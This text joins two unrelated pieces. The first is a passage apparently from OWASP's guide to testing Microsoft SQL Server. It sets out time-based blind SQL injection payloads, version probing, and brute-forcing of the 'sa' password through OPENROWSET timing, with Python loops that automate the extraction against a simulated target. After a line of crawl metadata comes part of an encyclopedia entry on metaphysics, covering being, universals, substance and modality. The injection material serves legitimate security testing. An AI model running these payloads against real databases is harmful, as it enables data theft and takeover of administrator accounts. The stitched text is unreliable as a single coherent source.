If more than one error message is displayed
On the other hand, if no prior information is available, there is still a possibility of attacking by exploiting any covert channel. It might happen that descriptive error messages are stopped, yet the error messages give some information. For example:
- In some cases the web application (actually the web server) might return the traditional 500: Internal Server Error, say when the application returns an exception that might be generated, for instance, by a query with unclosed quotes.
- While in other cases the server will return a 200 OK message, but the web application will return an error message inserted by the developers, such as Internal server error or bad data.
This one bit of information might be enough to understand how the dynamic SQL query is constructed by the web application and tune up an exploit.
Another out-of-band method is to output the results through HTTP browseable files.
There is one more possibility for making a blind SQL injection attack when there is no visible feedback from the application: measuring the time that the web application takes to answer a request. An attack of this sort is described by Anley in his paper "(more) Advanced SQL Injection" (see the References below), from which we take the next examples. A typical approach uses the waitfor delay command: let's say that the attacker wants to check if the 'pubs' sample database exists; he will simply inject the following command:
if exists (select * from pubs..pub_info) waitfor delay '0:0:5'
Depending on the time that the query takes to return, we will know the answer. In fact, what we have here is two things: a SQL injection vulnerability and a covert channel that allows the penetration tester to get 1 bit of information for each query. Hence, using several queries (as many queries as bits in the required information) the pen tester can get any data that is in the database. Look at the following query
declare @s varchar(8000)
declare @i int
select @s = db_name()
select @i = [some value]
if (select len(@s)) < @i waitfor delay '0:0:5'
Measuring the response time and using different values for @i, we can deduce the length of the name of the current database, and then start to extract the name itself with the following query:
if (ascii(substring(@s, @byte, 1)) & ( power(2, @bit))) > 0 waitfor delay '0:0:5'
This query will wait for 5 seconds if bit '@bit' of byte '@byte' of the name of the current database is 1, and will return at once if it is 0. By nesting two cycles (one for @byte and one for @bit) we will be able to extract the whole piece of information.
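Scripted, the two nested cycles look roughly as follows. The `oracle` function is a stand-in for the code that injects the query and reports whether the 5-second delay was observed; here it is simulated locally (against the string 'pubs') so the reconstruction logic can be followed end to end:

```python
SECRET = "pubs"  # stands in for db_name() on the target

def oracle(byte_pos, bit_pos):
    """Simulates the injected test:
    if (ascii(substring(@s, @byte, 1)) & power(2, @bit)) > 0 waitfor delay '0:0:5'
    Returns True when the query was delayed (i.e., the bit is 1)."""
    if byte_pos > len(SECRET):
        return False
    return (ord(SECRET[byte_pos - 1]) & (1 << bit_pos)) > 0

def extract(length):
    """Rebuild the secret one bit at a time, 8 oracle queries per byte."""
    name = ""
    for byte in range(1, length + 1):   # @byte, 1-based as in T-SQL
        value = 0
        for bit in range(8):            # @bit
            if oracle(byte, bit):
                value |= 1 << bit
        name += chr(value)
    return name
```

In a real test, each `oracle` call costs up to one timeout, so extracting a string takes 8 × length queries (the length itself having been found first with the len(@s) < @i probe above).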
However, it might happen that the command waitfor is not available (e.g., because it is filtered by an IPS/web application firewall). This doesn't mean that blind SQL injection attacks cannot be done, as the pen tester only needs to come up with some time-consuming operation that is not filtered. For example:
declare @i int
select @i = 0
while @i < 0xaffff
begin
    select @i = @i + 1
end
Checking for version and vulnerabilities
The same timing approach can also be used to understand which version of SQL Server we are dealing with. Of course we will leverage the built-in @@version variable. Consider the following query:
select @@version
On SQL Server 2005, it will return something like the following:
Microsoft SQL Server 2005 - 9.00.1399.06 (Intel X86) Oct 14 2005 00:33:37 <snip>
The '2005' part of the string spans from the 22nd to the 25th character. Therefore, one query to inject can be the following:
if substring((select @@version),25,1) = 5 waitfor delay '0:0:5'
Such a query will wait 5 seconds if the 25th character of the @@version variable is '5', showing us that we are dealing with SQL Server 2005. If the query returns immediately, we are probably dealing with SQL Server 2000, and another similar query will help to clear all doubts.
Example 9: bruteforce of sysadmin password
To bruteforce the sysadmin password, we can leverage the fact that OPENROWSET needs proper credentials to successfully perform the connection and that such a connection can be also "looped" to the local DB Server. Combining these features with an inferenced injection based on response timing, we can inject the following code:
select * from OPENROWSET('SQLOLEDB','';'sa';'<pwd>','select 1;waitfor delay ''0:0:5'' ')
What we do here is to attempt a connection to the local database (specified by the empty field after 'SQLOLEDB') using "sa" and "<pwd>" as credentials. If the password is correct and the connection is successful, the query is executed, making the DB wait for 5 seconds (and also returning a value, since OPENROWSET expects at least one column). Fetching the candidate passwords from a wordlist and measuring the time needed for each connection, we can attempt to guess the correct password. In "Data-mining with SQL Injection and Inference", David Litchfield pushes this technique even further, by injecting a piece of code in order to bruteforce the sysadmin password using the CPU resources of the DB Server itself. Once we have the sysadmin password, we have two choices:
- Inject all following queries using OPENROWSET, in order to use sysadmin privileges
- Add our current user to the sysadmin group using sp_addsrvrolemember. The current user name can be extracted using inferenced injection against the variable system_user.
Remember that OPENROWSET is accessible to all users on SQL Server 2000 but it is restricted to administrative accounts on SQL Server 2005.
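The driving loop of such a bruteforce is a few lines of scripting. In this sketch the payload is assembled exactly as above and the timing check is simulated; in a real test, `try_password` (a made-up name) would submit the injected query and measure the response time:

```python
DELAY = 5.0
CORRECT = "s3cret"   # simulated sysadmin password, for the local demo only

def build_payload(pwd):
    # Note: a password containing a single quote would need doubling in T-SQL.
    return ("select * from OPENROWSET('SQLOLEDB','';'sa';'%s',"
            "'select 1;waitfor delay ''0:0:5'' ')" % pwd)

def try_password(pwd):
    """Simulated response time: a correct password triggers the 5 s delay,
    a wrong one makes the connection fail quickly."""
    return DELAY if pwd == CORRECT else 0.1

def bruteforce(wordlist, threshold=DELAY * 0.8):
    for pwd in wordlist:
        if try_password(pwd) >= threshold:
            return pwd, build_payload(pwd)
    return None, None

found, payload = bruteforce(["password", "sa", "s3cret"])
```

The threshold is set below the full delay to tolerate network jitter; each wrong candidate costs only the normal connection-failure time.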
- David Litchfield: "Data-mining with SQL Injection and Inference" - http://www.nextgenss.com/research/papers/sqlinference.pdf
- Chris Anley, "(more) Advanced SQL Injection" - http://www.ngssoftware.com/papers/more_advanced_sql_injection.pdf
- Steve Friedl's Unixwiz.net Tech Tips: "SQL Injection Attacks by Example" - http://www.unixwiz.net/techtips/sql-injection.html
- Alexander Chigrik: "Useful undocumented extended stored procedures" - http://www.mssqlcity.com/Articles/Undoc/UndocExtSP.htm
- Antonin Foller: "Custom xp_cmdshell, using shell object" - http://www.motobit.com/tips/detpg_cmdshell
- Paul Litwin: "Stop SQL Injection Attacks Before They Stop You" - http://msdn.microsoft.com/msdnmag/issues/04/09/SQLInjection/
- SQL Injection - http://msdn2.microsoft.com/en-us/library/ms161953.aspx
- Francois Larouche: Multiple DBMS SQL Injection tool - [SQL Power Injector]
- Northern Monkee: [Bobcat]
- icesurfer: SQL Server Takeover Tool - [sqlninja]
- Bernardo Damele A. G.: sqlmap, automatic SQL injection tool - http://sqlmap.sourceforge.net | <urn:uuid:7795b513-ed0c-47f6-931d-933d2fa32239> | CC-MAIN-2023-14 | https://wiki.owasp.org/index.php?title=Testing_for_SQL_Server&direction=next&oldid=68768 | s3://commoncrawl/crawl-data/CC-MAIN-2023-14/segments/1679296948867.32/warc/CC-MAIN-20230328135732-20230328165732-00411.warc.gz | en | 0.80826 | 5,394 | 2.53125 | 3 |
It is not easy to say what metaphysics is. Ancient and Medieval philosophers might have said that metaphysics was, like chemistry or astrology, to be defined by its subject-matter: metaphysics was the “science” that studied “being as such” or “the first causes of things” or “things that do not change”. It is no longer possible to define metaphysics that way, for two reasons. First, a philosopher who denied the existence of those things that had once been seen as constituting the subject-matter of metaphysics—first causes or unchanging things—would now be considered to be making thereby a metaphysical assertion. Second, there are many philosophical problems that are now considered to be metaphysical problems (or at least partly metaphysical problems) that are in no way related to first causes or unchanging things—the problem of free will, for example, or the problem of the mental and the physical.
The first three sections of this entry examine a broad selection of problems considered to be metaphysical and discuss ways in which the purview of metaphysics has expanded over time. We shall see that the central problems of metaphysics were significantly more unified in the Ancient and Medieval eras. Which raises a question—is there any common feature that unites the problems of contemporary metaphysics? The final two sections discuss some recent theories of the nature and methodology of metaphysics. We will also consider arguments that metaphysics, however defined, is an impossible enterprise.
- 1. The Word ‘Metaphysics’ and the Concept of Metaphysics
- 2. The Problems of Metaphysics: the “Old” Metaphysics
- 3. The Problems of Metaphysics: the “New” Metaphysics
- 4. The Methodology of Metaphysics
- 5. Is Metaphysics Possible?
- Academic Tools
- Other Internet Resources
- Related Entries
1. The Word ‘Metaphysics’ and the Concept of Metaphysics
The word ‘metaphysics’ is notoriously hard to define. Twentieth-century coinages like ‘meta-language’ and ‘metaphilosophy’ encourage the impression that metaphysics is a study that somehow “goes beyond” physics, a study devoted to matters that transcend the mundane concerns of Newton and Einstein and Heisenberg. This impression is mistaken. The word ‘metaphysics’ is derived from a collective title of the fourteen books by Aristotle that we currently think of as making up Aristotle's Metaphysics. Aristotle himself did not know the word. (He had four names for the branch of philosophy that is the subject-matter of Metaphysics: ‘first philosophy’, ‘first science’, ‘wisdom’, and ‘theology’.) At least one hundred years after Aristotle's death, an editor of his works (in all probability, Andronicus of Rhodes) titled those fourteen books “Ta meta ta phusika”—“the after the physicals” or “the ones after the physical ones”—the “physical ones” being the books contained in what we now call Aristotle's Physics. The title was probably meant to warn students of Aristotle's philosophy that they should attempt Metaphysics only after they had mastered “the physical ones”, the books about nature or the natural world—that is to say, about change, for change is the defining feature of the natural world.
This is the probable meaning of the title because Metaphysics is about things that do not change. In one place, Aristotle identifies the subject-matter of first philosophy as “being as such”, and, in another as “first causes”. It is a nice—and vexed—question what the connection between these two definitions is. Perhaps this is the answer: The unchanging first causes have nothing but being in common with the mutable things they cause. Like us and the objects of our experience—they are, and there the resemblance ceases. (For a detailed and informative recent guide to Aristotle's Metaphysics, see Politis 2004.)
Should we assume that ‘metaphysics’ is a name for that “science” which is the subject-matter of Aristotle's Metaphysics? If we assume this, we should be committed to something in the neighborhood of the following theses:
- The subject-matter of metaphysics is “being as such”
- The subject-matter of metaphysics is the first causes of things
- The subject-matter of metaphysics is that which does not change
Any of these three theses might have been regarded as a defensible statement of the subject-matter of what was called ‘metaphysics’ until the seventeenth century. But then, rather suddenly, many topics and problems that Aristotle and the Medievals would have classified as belonging to physics (the relation of mind and body, for example, or the freedom of the will, or personal identity across time) began to be reassigned to metaphysics. One might almost say that in the seventeenth century metaphysics began to be a catch-all category, a repository of philosophical problems that could not be otherwise classified as epistemology, logic, ethics or other branches of philosophy. (It was at about that time that the word ‘ontology’ was invented—to be a name for the science of being as such, an office that the word ‘metaphysics’ could no longer fill.) The academic rationalists of the post-Leibnizian school were aware that the word ‘metaphysics’ had come to be used in a more inclusive sense than it had once been. Christian Wolff attempted to justify this more inclusive sense of the word by this device: while the subject-matter of metaphysics is being, being can be investigated either in general or in relation to objects in particular categories. He distinguished between ‘general metaphysics’ (or ontology), the study of being as such, and the various branches of ‘special metaphysics’, which study the being of objects of various special sorts, such as souls and material bodies. (He does not assign first causes to general metaphysics, however: the study of first causes belongs to natural theology, a branch of special metaphysics.) It is doubtful whether this maneuver is anything more than a verbal ploy. In what sense, for example, is the practitioner of rational psychology (the branch of special metaphysics devoted to the soul) engaged in a study of being? 
Do souls have a different sort of being from that of other objects?—so that in studying the soul one learns not only about its nature (that is, its properties: rationality, immateriality, immortality, its capacity or lack thereof to affect the body …), but also about its “mode of being”, and hence learns something about being? It is certainly not true that all, or even very many, rational psychologists said anything, qua rational psychologists, that could plausibly be construed as a contribution to our understanding of being.
Perhaps the wider application of the word ‘metaphysics’ was due to the fact that the word ‘physics’ was coming to be a name for a new, quantitative science, the science that bears that name today, and was becoming increasingly inapplicable to the investigation of many traditional philosophical problems about changing things (and of some newly discovered problems about changing things).
Whatever the reason for the change may have been, it would be flying in the face of current usage (and indeed of the usage of the last three or four hundred years) to stipulate that the subject-matter of metaphysics was to be the subject-matter of Aristotle's Metaphysics. It would, moreover, fly in the face of the fact that there are and have been paradigmatic metaphysicians who deny that there are first causes—this denial is certainly a metaphysical thesis in the current sense—others who insist that everything changes (Heraclitus and any more recent philosopher who is both a materialist and a nominalist), and others still (Parmenides and Zeno) who deny that there is a special class of objects that do not change. In trying to characterize metaphysics as a field, the best starting point is to consider the myriad topics traditionally assigned to it.
2. The Problems of Metaphysics: the “Old” Metaphysics
2.1 Being As Such, First Causes, Unchanging Things
If metaphysics now considers a wider range of problems than those studied in Aristotle's Metaphysics, those original problems continue to belong to its subject-matter. For instance, the topic of “being as such” (and “existence as such”, if existence is something other than being) is one of the matters that belong to metaphysics on any conception of metaphysics. The following theses are all paradigmatically metaphysical:
- “Being is; not-being is not” [Parmenides];
- “Essence precedes existence” [Avicenna, paraphrased];
- “Existence in reality is greater than existence in the understanding alone” [St Anselm, paraphrased];
- “Existence is a perfection” [Descartes, paraphrased];
- “Being is a logical, not a real predicate” [Kant, paraphrased];
- “Being is the most barren and abstract of all categories” [Hegel, paraphrased];
- “Affirmation of existence is in fact nothing but denial of the number zero” [Frege];
- “Universals do not exist but rather subsist or have being” [Russell, paraphrased];
- “To be is to be the value of a bound variable” [Quine].
It seems reasonable, moreover, to say that investigations into non-being belong to the topic “being as such” and thus belong to metaphysics. (This did not seem reasonable to Meinong, who wished to confine the subject-matter of metaphysics to “the actual” and who therefore did not regard his Theory of Objects as a metaphysical theory. According to the conception of metaphysics adopted in this article, however, his thesis [paraphrased] “Predication is independent of being” is paradigmatically metaphysical.)
The topics “the first causes of things” and “unchanging things” have continued to interest metaphysicians, though they are not now seen as having any important connection with the topic “being as such”. The first three of Aquinas's Five Ways are metaphysical arguments on any conception of metaphysics. Additionally, the thesis that there are no first causes and the thesis that there are no things that do not change count as metaphysical theses, for in the current conception of metaphysics, the denial of a metaphysical thesis is a metaphysical thesis. No post-Medieval philosopher would say anything like this:
I study the first causes of things, and am therefore a metaphysician. My colleague Dr McZed denies that there are any first causes and is therefore not a metaphysician; she is, rather, an anti-metaphysician. In her view, metaphysics is a science with a non-existent subject-matter, like astrology.
This feature of the contemporary conception of metaphysics is nicely illustrated by a statement of Sartre's:
I do not think myself any less a metaphysician in denying the existence of God than Leibniz was in affirming it. (1949: 139)
An anti-metaphysician in the contemporary sense is not a philosopher who denies that there are objects of the sorts that an earlier philosopher might have said formed the subject-matter of metaphysics (first causes, things that do not change, universals, substances, …), but rather a philosopher who denies the legitimacy of the question whether there are objects of those sorts.
The three original topics—the nature of being; the first causes of things; things that do not change—remained topics of investigation by metaphysicians after Aristotle. Another topic, discussed in the following subsection, occupies an intermediate position between Aristotle and his successors.
2.2 Categories of Being and Universals
We human beings sort things into various classes. And we often suppose that the classes into which we sort things enjoy a kind of internal unity. In this respect they differ from sets in the strict sense of the word. (And no doubt in others. It would seem, for example, that we think of the classes we sort things into—biological species, say—as comprising different members at different times.) The classes into which we sort things are in most cases “natural” classes, classes whose membership is in some important sense uniform—“kinds”. We shall not attempt an account or definition of ‘natural class’ here. Examples must suffice. There are certainly sets whose members do not make up natural classes: a set that contains all dogs but one, and a set that contains all dogs and exactly one cat do not correspond to natural classes in anyone's view. And it is tempting to suppose that there is a sense of “natural” in which dogs make up a natural class, to suppose that in dividing the world into dogs and non-dogs, we “cut nature at the joints”. It is, however, a respectable philosophical thesis that the idea of a natural class cannot survive philosophical scrutiny. If that respectable thesis is true, the topic “the categories of being” is a pseudo-topic. Let us simply assume that the respectable thesis is false and that things fall into various natural classes—hereinafter, simply classes.
Some of the classes into which we sort things are more comprehensive than others: all dogs are animals, but not all animals are dogs; all animals are living organisms, but not all living organisms are animals …. Now the very expression “sort things into classes” suggests that there is a most comprehensive class: the class of things, the class of things that can be sorted into classes. But is this so?—and if it is so, are there classes that are “just less comprehensive” than this universal class? If there are, can we identify them?—and are there a vast (perhaps even an infinite) number of them, or some largish, messy number like forty-nine, or some small, neat number like seven or four? Let us call any such less comprehensive classes the ‘categories of being’ or the ‘ontological categories’. (The former term, if not the latter, presupposes a particular position on one question about the nature of being: that everything is, that the universal class is the class of beings, the class of things that are. It thus presupposes that Meinong was wrong to say that “there are things of which it is true that there are no such things”.)
The topic “the categories of being” is intermediate between the topic “the nature of being” and the topics that fall under the post-Medieval conception of metaphysics for a reason that can be illustrated by considering the problem of universals. Universals, if they indeed exist, are, in the first instance, properties or qualities or attributes (e.g., “ductility” or “whiteness”) that are supposedly universally “present in” the members of classes of things and relations (e.g., “being to the north of”) that are supposedly universally present in the members of classes of sequences of things. “In the first instance”: it may be that things other than qualities and relations are universals, although qualities and relations are the items most commonly put forward as examples of universals. It may be that the novel War and Peace is a universal, a thing that is in some mode present in each of the many tangible copies of the novel. It may be that the word “horse” is a universal, a thing that is present in each of the many audible utterances of the word. And it may be that natural classes or kinds are themselves universals—it may be that there is such a thing as “the horse” or the species Equus caballus, distinct from its defining attribute “being a horse” or “equinity”, and in some sense “present in” each horse. (Perhaps some difference between the attribute “being a horse” and the attribute “being either a horse or a kitten” explains why the former is the defining attribute of a kind and the latter is not. Perhaps the former attribute exists and the latter does not; perhaps the former has the second-order attribute “naturalness” and the latter does not; perhaps the former is more easily apprehended by the intellect than the latter.)
The thesis that universals exist—or at any rate “subsist” or “have being”—is variously called ‘realism’ or ‘Platonic realism’ or ‘platonism’. All three terms are objectionable. Aristotle believed in the reality of universals, but it would be at best an oxymoron to call him a platonist or a Platonic realist. And ‘realism’ tout court has served as a name for a variety of philosophical theses. The thesis that universals do not exist—do not so much as subsist; have no being of any sort—is generally called ‘nominalism’. This term, too, is objectionable. At one time, those who denied the existence of universals were fond of saying things like:
There is no such thing as “being a horse”: there is only the name [nomen, gen. nominis] “horse”, a mere flatus vocis [puff of sound].
Present-day nominalists, however, are aware, if earlier nominalists were not, that if the phrase ‘the name “horse” ’ designated an object, the object it designated would itself be a universal or something very like one. It would not be a mere puff of sound but would rather be what was common to the many puffs of sound that were its tokens.
The old debate between the nominalists and the realists continues to the present day. Most realists suppose that universals constitute one of the categories of being. This supposition could certainly be disputed without absurdity. Perhaps there is a natural class of things to which all universals belong but which contains other things as well (and is not the class of all things). Perhaps, for example, numbers and propositions are not universals, and perhaps numbers and propositions and universals are all members of a class of “abstract objects”, a class that some things do not belong to. Or perhaps there is such a thing as “the whiteness of the Taj Mahal” and perhaps this object and the universal “whiteness”—but not the Taj Mahal itself—both belong to the class of “properties”. Let us call such a class—a proper subclass of an ontological category, a natural class that is neither the class of all things nor one of the ontological categories—an ‘ontological sub-category’. It may indeed be that universals make up a sub-category of being and are members of the category of being “abstract object”. But few if any philosophers would suppose that universals were members of forty-nine sub-categories—much less of a vast number or an infinity of sub-categories. Most philosophers who believe in the reality of universals would want to say that universals, if they do not constitute an ontological category, at least constitute one of the “higher” sub-categories. If dogs form a natural class, this class is—by the terms of our definition—an ontological sub-category. And this class will no doubt be a subclass of many sub-categories: the genus canis, the class (in the biological sense) mammalia, …, and so through a chain of sub-categories that eventually reaches some very general sub-category like “substance” or “material object”. Thus, although dogs may compose an ontological sub-category, this sub-category—unlike the category “universal”—is one of the “lower” ones. 
These reflections suggest that the topic “the categories of being” should be understood to comprehend both the categories of being sensu stricto and their immediate sub-categories.
Does the topic “the categories of being” belong to metaphysics in the “old” sense? A case can be made for saying that it does, based on the fact that Plato's theory of forms (universals, attributes) is a recurrent theme in Aristotle's Metaphysics. In Metaphysics, two of Plato's central theses about the forms come in for vigorous criticism: (i) that things that would, if they existed, be “inactive” (the forms) could be the primary beings, the “most real” things, and (ii) that the attributes of things exist “separately” from the things whose attributes they are. We shall be concerned only with (ii). In the terminology of the Schools, that criticism can be put this way: Plato wrongly believed that universals existed ante res (prior to objects); the correct view is that universals exist in rebus (in objects). It is because this aspect of the problem of universals—whether universals exist ante res or in rebus—is discussed at length in Metaphysics, that a strong case can be made for saying that the problem of universals falls under the old conception of metaphysics. (And the question whether universals, given that they exist at all, exist ante res or in rebus is as controversial in the twenty-first century as it was in the thirteenth century and the fourth century B.C.E.) If we do decide that the problem of universals belongs to metaphysics on the old conception, then, since we have liberalized the old conception by applying to it the contemporary rule that the denial of a metaphysical position is to be regarded as a metaphysical position, we shall have to say that the question whether universals exist at all is a metaphysical question under the old conception—and that nominalism is therefore a metaphysical thesis.
There is, however, also a case to be made against classifying the problem of universals as a problem of metaphysics in the (liberalized) old sense. For there is more to the problem of universals than the question whether universals exist and the question whether, if they do exist, their existence is ante res or in rebus. For example, the problem of universals also includes questions about the relation between universals (if such there be) and the things that are not universals, the things usually called particulars. Aristotle did not consider these questions in the Metaphysics. One might therefore plausibly contend that only one part of the problem of universals (the part that pertains to the existence and nature of universals) belongs to metaphysics in the old sense. At one time, a philosopher might have said,
The universal “doghood” is a thing that does not change. Therefore, questions about its nature belong to metaphysics, the science of things that do not change. But dogs are things that change. Therefore, questions concerning the relation of dogs to doghood do not belong to metaphysics.
But no contemporary philosopher would divide the topics that way—not even if he or she believed that doghood existed and was a thing that did not change. A contemporary philosopher—if that philosopher concedes that there is any problem that can properly be called “the problem of universals”—will see the problem of universals as a problem properly so called, as a problem having the kind of internal unity that leads philosophers to speak of a philosophical problem. And the same point applies to the topic “the categories of being”: every philosopher who is willing to say that “What are the categories of being?” is a meaningful question will assign every aspect of that question to metaphysics.
Let us consider some aspects of the problem of universals that concern changing things. (That is, that concern particulars—for even if there are particulars that do not change, most of the particulars that figure in discussions of the problem of universals as examples are things that change.) Consider two white particulars—the Taj Mahal, say, and the Washington Monument. And suppose that both these particulars are white in virtue of (i.e., their being white consists in) their bearing some one, identifiable relation to the universal “whiteness”. Suppose further that we are able to single out this relation by some sort of act of intellectual attention or abstraction, and that (having done so) we have given it the name “falling under”. All white things and only white things fall under whiteness, and falling under whiteness is what it is to be white. (We pass over many questions that would have to be addressed if we were discussing the problem of universals for its own sake. For example, both blueness and redness are spectral color-properties, and whiteness is not. Does this fact imply that “being a spectral color-property” is, as one might say, a second-order universal? If so, does blueness “fall under” this universal in the same sense as the sense in which a copy of Philosophical Studies falls under blueness?)
Now what can we say about this relation, this “falling under”? What is it about the two objects whiteness and the Taj Mahal that is responsible for the fact that the latter falls under the former? Is the Taj perhaps a “bundle” of universalia ante res, and does it fall under whiteness in virtue of the fact that whiteness is one of the universals that is a constituent of the bundle that it is? Or might it be that a particular like the Taj, although it indeed has universals as constituents, is something more than its universal constituents? Might it be that the Taj has a constituent that is not a universal, a “substrate”, a particular that is in some sense property-less and that holds the universal constituents of the Taj together—that “bundles” them? (If we take that position, then we may want to say, with Armstrong (1989: 94–96), that the Taj is a ‘thick particular’ and its substrate a ‘thin particular’: a thick particular being a thin particular taken together with the properties it bundles.) Or might the Taj have constituents that are neither universals nor substrates? Might we have been too hasty when we defined ‘particulars’ as things that are not universals? Could there perhaps be two kinds of non-universals, concrete non-universals or concrete individuals (those would be the particulars, thick or thin), and abstract non-universals or abstract individuals (‘accidents’ or ‘tropes’ or ‘property instances’), things that are properties or qualities (and relations as well), things like “the (individual) whiteness of the Taj Mahal”? Is the Taj perhaps a bundle not of universals but of accidents? Or is it composed of a substrate and a bundle of accidents? And we cannot neglect the possibility that Aristotle was right and that universals exist only in rebus. If that is so, we must ask what the relation is between the matter that composes a particular and the universals that inhere in it—that inhere simultaneously in “this” matter and in “that” matter.
The series of questions that was set out in the preceding paragraph was introduced by observing that the problem of universals includes both questions about the existence and nature of universals and questions about how universals are related to the particulars that fall under them. Many of the theories that were alluded to in that series of questions could be described as theories of the “ontological structure” of non-universals. We can contrast ontological structure with mereological structure. A philosophical question concerns the mereological structure of an object if it is a question about the relation between that object and those of its constituents that belong to the same ontological category as the object. For example, the philosopher who asks whether the Taj Mahal has a certain block of marble among its constituents essentially or only accidentally is asking a question about the mereological structure of the Taj, since the block and the building belong to the same ontological category. But the philosopher who asks whether the Taj has “whiteness” as a constituent and the philosopher who supposes that the Taj does have this property-constituent and asks, “What is the nature of this relation ‘constituent of’ that ‘whiteness’ bears to the Taj?” are asking questions about its ontological structure.
Many philosophers have supposed that particulars fall under universals by somehow incorporating them into their ontological structure. And other philosophers have supposed that the ontological structure of a particular incorporates individual properties or accidents—and that an accident is an accident of a certain particular just in virtue of being a constituent of that particular.
Advocates of the existence of ante res universals, and particularly those who deny that these universals are constituents of particulars, tend to suppose that universals abound—that there is not only such a universal as whiteness but such a universal as “being both white and round and either shiny or not made of silver”. Advocates of other theories of universals are almost always less liberal in the range of universals whose existence they will allow. The advocate of in rebus universals is unlikely to grant the existence of “being both white and round and either shiny or not made of silver”, even in the case in which there is an object that is both white and round and either shiny or not made of silver (such as a non-shiny white plastic ball).
The two topics “the categories of being” and “the ontological structure of objects” are intimately related to each other and to the problem of universals. It is not possible to propose a solution to the problem of universals that does not have implications for the topic “the categories of being”. (Even nominalism implies that at least one popular candidate for the office “ontological category” is non-existent or empty.) It is certainly possible to maintain that there are ontological categories that are not directly related to the problem of universals (“proposition”, “state of affairs”, “event”, “mere possibile”), but any philosopher who maintains this will nevertheless maintain that if there are universals they make up at least one of the higher ontological sub-categories. And it seems that it is possible to speak of ontological structure only if one supposes that there are objects of different ontological categories. So whatever metaphysics comprehends, it must comprehend every aspect of the problem of universals and every aspect of the topics “the categories of being” and “the ontological structure of objects”. For a recent investigation of the problems that have been discussed in this section, see Lowe (2006).
We turn now to a topic that, strictly speaking, belongs to “the categories of being”, but which is important enough to be treated separately.

2.3 Substance
Some things (if they exist at all) are present only “in” other things: a smile, a haircut (product, not process), a hole …. Such things may be opposed to things that exist “in their own right”. Metaphysicians call the things that exist in their own right ‘substances’. Aristotle called them ‘protai ousiai’ or “primary beings”. They make up the most important of his ontological categories. Several features define protai ousiai: they are subjects of predication that cannot themselves be predicated of things (they are not universals); things exist “in” them, but they do not exist “in” things (they are not accidents like Socrates' wisdom or his ironic smile); they have determinate identities (essences). This last feature could be put this way in contemporary terms: if the prote ousia x exists at a certain time and the prote ousia y exists at some other time, it makes sense to ask whether x and y are the same, are numerically identical (and the question must have a determinate answer); and the question whether a given prote ousia would exist in some set of counterfactual circumstances must likewise have an answer (at least if the circumstances are sufficiently determinate—if, for example, they constitute a possible world. More on this in the next section). It is difficult to suppose that smiles or holes have this sort of determinate identity. To ask whether the smile Socrates smiled today is the smile he smiled yesterday (or is the smile he would have smiled if Crito had asked one of his charmingly naïve questions) can only be a question about descriptive identity.
Aristotle uses ‘(prote) ousia’ not only as a count-noun but as a mass term. (He generally writes ‘ousia’ without qualification when he believes that the context will make it clear that he means ‘prote ousia’.) For example, he not only asks questions like “Is Socrates a (prote) ousia?” and “What is a (prote) ousia?”, but questions like “What is the (prote) ousia of Socrates?” and “What is (prote) ousia?” (Which question he is asking sometimes has to be inferred from the context, since there is no indefinite article in Greek.) In the count-noun sense of the term, Aristotle identifies at least some (protai) ousiai with ta hupokeimena or “underlying things”. Socrates, for example, is a hupokeimenon in that he “lies under” the in rebus universals under which he falls and the accidents that inhere in him. ‘To hupokeimenon’ has an approximate Latin equivalent in ‘substantia’, “that which stands under”. (Apparently, “to stand under” and “to lie under” are equally good metaphorical descriptions of the relations a thing bears to its qualities and accidents.) Owing both to the close association of (protai) ousiai and hupokeimena in Aristotle's philosophy and to the absence of a suitable Latin equivalent of ‘ousia’, ‘substantia’ became the customary Latin translation of the count-noun ‘(prote) ousia’.
The question whether there in fact are substances continues to be one of the central questions of metaphysics. Several closely related questions are: How, precisely, should the concept of substance be understood?; Which of the items (if any of them) among those we encounter in everyday life are substances?; If there are substances at all, how many of them are there?—is there only one as Spinoza contended, or are there many as most of the rationalists supposed?; What kinds of substances are there?—are there immaterial substances, eternal substances, necessarily existent substances?
It must be emphasized that there is no universally accepted and precise definition of ‘substance’. Depending on how one understood the word (or the concept) one might say either that Hume denied that there were any substances or that he held that the only substances (or the only substances of which we have any knowledge) were impressions and ideas. It would seem, however, that most philosophers who are willing to use the word ‘substance’ at all would deny that any of the following (if they exist) are substances:
- Universals and other abstract objects. (It should be noted that Aristotle criticized Plato for supposing that the protai ousiai were ante res universals.)
- Events, processes, or changes. (But some metaphysicians contend that substance/event is a false dichotomy.)
- Stuffs, such as flesh or iron or butter. (Unfortunately for beginning students of metaphysics, the usual meaning of ‘substance’ outside philosophy is stuff. Aristotle criticized “the natural philosophers” for supposing that the prote ousia could be a stuff—water or air or fire or matter.)
The nature of being, the problem of universals, and the nature of substance have been recognized as topics that belong to “metaphysics” by almost everyone who has used the word. We now turn to topics that belong to metaphysics only in the post-Medieval sense.
3. The Problems of Metaphysics: the “New” Metaphysics
Philosophers have long recognized that there is an important distinction within the class of true propositions: the distinction between those propositions that might have been false and those that could not have been false (those that must be true). Compare, for example, the proposition that Paris is the capital of France and the proposition that there is a prime between every number greater than 1 and its double. Both are true, but the former could have been false and the latter could not have been false. Likewise, there is a distinction to be made within the class of false propositions: between those that could have been true and those that could not have been true (those that had to be false).
Some Medieval philosophers supposed that the fact that true propositions are of the two sorts “necessarily true” and “contingently true” (and the corresponding fact about false propositions) showed that there were two “modes” in which a proposition could be true (or false): the mode of contingency and the mode of necessity—hence the term ‘modality’. Present-day philosophers retain the Medieval term ‘modality’ but now it means no more than “pertaining to possibility and necessity”. The types of modality of interest to metaphysicians fall into two camps: modality de re and modality de dicto.
Modality de dicto is the modality of propositions (‘dictum’ means proposition, or close enough). If modality were coextensive with modality de dicto, it would be at least a defensible position that the topic of modality belongs to logic rather than to metaphysics. (Indeed, the study of modal logics goes back to Aristotle's Prior Analytics.)
But many philosophers also think there is a second kind of modality, modality de re—the modality of things. (The modality of substances, certainly, and perhaps of things in other ontological categories.) The status of modality de re is undeniably a metaphysical topic, and we assign it to the “new” metaphysics because, although one can ask modal questions about things that do not change—God, for example, or universals—a large proportion of the work that has been done in this area concerns the modal features of changing things.
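The de dicto/de re contrast can be made vivid with the standard scope illustration from modal logic (a textbook sketch, not drawn from the authors discussed here; ‘B’ and ‘U’ abbreviate hypothetical predicates “is a bachelor” and “is unmarried”):

```latex
% De dicto: the necessity operator governs a whole closed sentence (a dictum).
% "Necessarily, every bachelor is unmarried" -- true, a matter of meaning.
\Box\,\forall x\,(Bx \rightarrow Ux)

% De re: the necessity operator governs an open formula, ascribing a modal
% property to each thing (res) itself.
% "Every bachelor is such that he is necessarily unmarried" -- false,
% since any given bachelor could have married.
\forall x\,(Bx \rightarrow \Box\, Ux)
```

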